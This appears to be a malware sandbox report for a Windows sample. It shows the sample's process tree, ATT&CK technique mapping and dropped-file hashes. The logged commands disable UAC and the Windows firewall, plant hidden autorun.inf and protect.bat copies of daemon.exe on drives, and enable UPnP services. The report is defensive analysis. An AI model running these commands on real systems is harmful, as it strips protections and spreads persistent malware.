C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:4708 -
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f4⤵PID:3748
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"3⤵PID:2000
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\autorun.inf"4⤵
- Sets file to hidden
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4696
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"3⤵PID:388
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\autorun.inf"4⤵
- Sets file to hidden
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f3⤵PID:1412
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f4⤵PID:2252
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵PID:2044
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
PID:636
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto3⤵PID:4784
-
C:\Windows\SysWOW64\sc.exesc config upnphost start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4444
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto3⤵
- System Location Discovery: System Language Discovery
PID:2300 -
C:\Windows\SysWOW64\sc.exesc config SSDPSRV start= auto4⤵
- Launches sc.exe
PID:3152
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config browser start= auto3⤵
- System Location Discovery: System Language Discovery
PID:224 -
C:\Windows\SysWOW64\sc.exesc config browser start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4680
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start upnphost3⤵PID:2600
-
C:\Windows\SysWOW64\net.exenet start upnphost4⤵PID:3148
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost5⤵PID:3080
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start SSDPSRV3⤵
- System Location Discovery: System Language Discovery
PID:5076 -
C:\Windows\SysWOW64\net.exenet start SSDPSRV4⤵PID:4040
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV5⤵
- System Location Discovery: System Language Discovery
PID:4592
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start browser3⤵
- System Location Discovery: System Language Discovery
PID:4536 -
C:\Windows\SysWOW64\net.exenet start browser4⤵PID:1332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start browser5⤵
- System Location Discovery: System Language Discovery
PID:3980
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off3⤵PID:2384
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1448
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:1724 -
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
- Modifies firewall policy service
- System Location Discovery: System Language Discovery
PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵PID:1892
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
PID:3748
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵PID:2264
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off3⤵PID:700
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4440
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f3⤵PID:2712
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:60
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f3⤵
- System Location Discovery: System Language Discovery
PID:1840 -
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:4680
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f3⤵
- System Location Discovery: System Language Discovery
PID:1200 -
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
PID:2536
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"3⤵
- System Location Discovery: System Language Discovery
PID:1836 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4608
-
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "F:\protect.bat"4⤵
- Views/modifies file attributes
PID:4764
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f3⤵PID:4688
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
PID:3692
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"3⤵
- System Location Discovery: System Language Discovery
PID:3540 -
C:\Windows\SysWOW64\attrib.exeattrib -R -H "C:\protect.bat"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3288
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f3⤵PID:556
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f4⤵
- Modifies Internet Explorer settings
PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f3⤵PID:3176
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f4⤵PID:3940
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f3⤵PID:3392
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3152
-
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f4⤵PID:2848
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"3⤵
- Modifies Internet Explorer settings
PID:2296
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3984
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\daemon.exe" "C:\protect.bat"3⤵PID:4056
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\daemon.exe" "F:\protect.bat"3⤵
- System Location Discovery: System Language Discovery
PID:4592 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3748
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"3⤵
- System Location Discovery: System Language Discovery
PID:532 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1448
-
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\protect.bat"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"3⤵PID:324
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1332
-
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\protect.bat"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1724
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"2⤵PID:4064
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f2⤵PID:2480
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:2152
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f2⤵PID:3096
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f3⤵PID:116
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- System Location Discovery: System Language Discovery
PID:1892 -
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
PID:4988
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto2⤵
- System Location Discovery: System Language Discovery
PID:624 -
C:\Windows\SysWOW64\sc.exesc config upnphost start= auto3⤵
- Launches sc.exe
PID:3388
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto2⤵PID:5076
-
C:\Windows\SysWOW64\sc.exesc config SSDPSRV start= auto3⤵
- Launches sc.exe
PID:728
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config browser start= auto2⤵PID:4460
-
C:\Windows\SysWOW64\sc.exesc config browser start= auto3⤵
- Launches sc.exe
PID:4236
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start upnphost2⤵
- System Location Discovery: System Language Discovery
PID:3816 -
C:\Windows\SysWOW64\net.exenet start upnphost3⤵PID:2600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost4⤵PID:2324
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start SSDPSRV2⤵PID:3968
-
C:\Windows\SysWOW64\net.exenet start SSDPSRV3⤵
- System Location Discovery: System Language Discovery
PID:2848 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV4⤵PID:4580
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start browser2⤵PID:4476
-
C:\Windows\SysWOW64\net.exenet start browser3⤵PID:4192
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start browser4⤵PID:1420
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off2⤵
- System Location Discovery: System Language Discovery
PID:1508 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3652
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f2⤵
- System Location Discovery: System Language Discovery
PID:856 -
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
- Modifies firewall policy service
PID:808
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f2⤵PID:4372
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵PID:4576
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f2⤵PID:1492
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:2148
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off2⤵
- System Location Discovery: System Language Discovery
PID:388 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4164
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f2⤵PID:4044
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f2⤵
- System Location Discovery: System Language Discovery
PID:4688 -
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f3⤵
- Modifies Internet Explorer settings
PID:1360
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f2⤵
- System Location Discovery: System Language Discovery
PID:2260 -
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f2⤵PID:3972
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f3⤵
- Modifies Internet Explorer settings
PID:3140
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
PID:3032 -
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f3⤵
- Modifies Internet Explorer settings
PID:2992
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f2⤵PID:3000
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f3⤵PID:2964
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f2⤵PID:3532
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f3⤵PID:532
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3908 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3908 CREDAT:17410 /prefetch:23⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:516
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3908 CREDAT:17416 /prefetch:23⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:548
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1524
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵PID:4392
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify System Firewall
2Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
273KB
MD584f755ce53cb1d70ba895c0f0f629595
SHA13fdf3e27b1541d52c9a865951a2bdee107c37473
SHA2565f9f5634db8e30d9d11a63baa794863ecf4855637f95e81b6fe667d9f85cab72
SHA512cd2cee1a1a8e4b53118b1a463fcf767a3fc72566663d16f5cbc563d79f2b9c47e4c1a60dbbd4c61faebcc1488a842783f9984433e2d52c2b5148918d3fb99de7
-
Filesize
187KB
MD53691476fc5c39dc117f5eae6c101a8f8
SHA1cc2bc87b524e4802c86261f37d127dfb95f5f2b1
SHA256d1bb6adf17167d1dc8fa90de52763b7c56c8964a2ce43470b405f9a76a727ad3
SHA5129a8a2c019f0a034e6bffa03ab986374947d3fe2ae72f9029656150eb6d28b6240596ef39c4b49d22c12de757960390a77eaa733fd5f9f5dce48f2d3d47cdb850
-
Filesize
63B
MD5f64baf418f685884efec59a9d80bc5f6
SHA19c90f7a7efd7ef3059837fdeb06b6b781ca6d1e9
SHA2564b9870b1f52e252451b3fa099e8b270c32ddc6fc29372067be28dcd009ec4e8f
SHA512dceecd6a564c974c71ceeb544b0dfde70a09315db6d72a50fdbecdc0cf505a7ce52b7a83a9a8c79e8cfbb996c054585da6d7c08bf0026b4d9ecdde5f0a2b2a69